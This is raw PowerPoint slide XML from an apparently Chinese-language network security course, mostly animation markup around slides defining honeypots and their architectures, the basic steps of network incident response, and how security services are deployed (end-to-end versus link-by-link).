                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714769"/>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714762"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71476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714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714770"/>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714763"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71476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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714771"/>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714765"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714765"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714765"/>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4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71477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3" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714764"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>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8" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="134" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714775"/>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714766"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714766"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7147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animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714757" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714758" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714759" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714760" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714761" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714762" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714763" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714764" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714765" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714766" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="714767" grpId="0" animBg="1"/>
      <p:bldP spid="714768" grpId="0" animBg="1"/>
      <p:bldP spid="714769" grpId="0" animBg="1"/>
      <p:bldP spid="714770" grpId="0" animBg="1"/>
      <p:bldP spid="714771" grpId="0" animBg="1"/>
      <p:bldP spid="714772" grpId="0" animBg="1"/>
      <p:bldP spid="714773" grpId="0" animBg="1"/>
      <p:bldP spid="714774" grpId="0" animBg="1"/>
      <p:bldP spid="714775"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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>蜜罐是一种攻击欺骗手段或工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模拟正常系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>诱导攻击者实施攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收集攻击信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>作用意义：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学习和研究攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改进防御能力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>吸引攻击火力，迟滞延缓对实际系统的攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>功能组件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统模拟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据收集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜罐</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3507049673"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>虚拟机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>多机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜网</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蜜罐架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8499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A0C7219E-EB3E-4328-AFDE-43E8FFAEE4F6}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>281</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防不胜防，亡羊补牢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全事件基本处理流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现事件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>确定影响范围，评估损失</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行预定的应急措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全事件通报、求援</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络应急响应</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8602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166DD70C-F753-4482-820C-CCC3FF2F54BE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>282</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全服务的部署</a:t>
            </a:r>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a:t>端到端</a:t>
              </a:r>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a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>链到链</a:t>
              </a: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细粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>安全服务多</a:t>
            </a:r>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a:t>粗粒度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>安全服务少</a:t>
            </a:r>
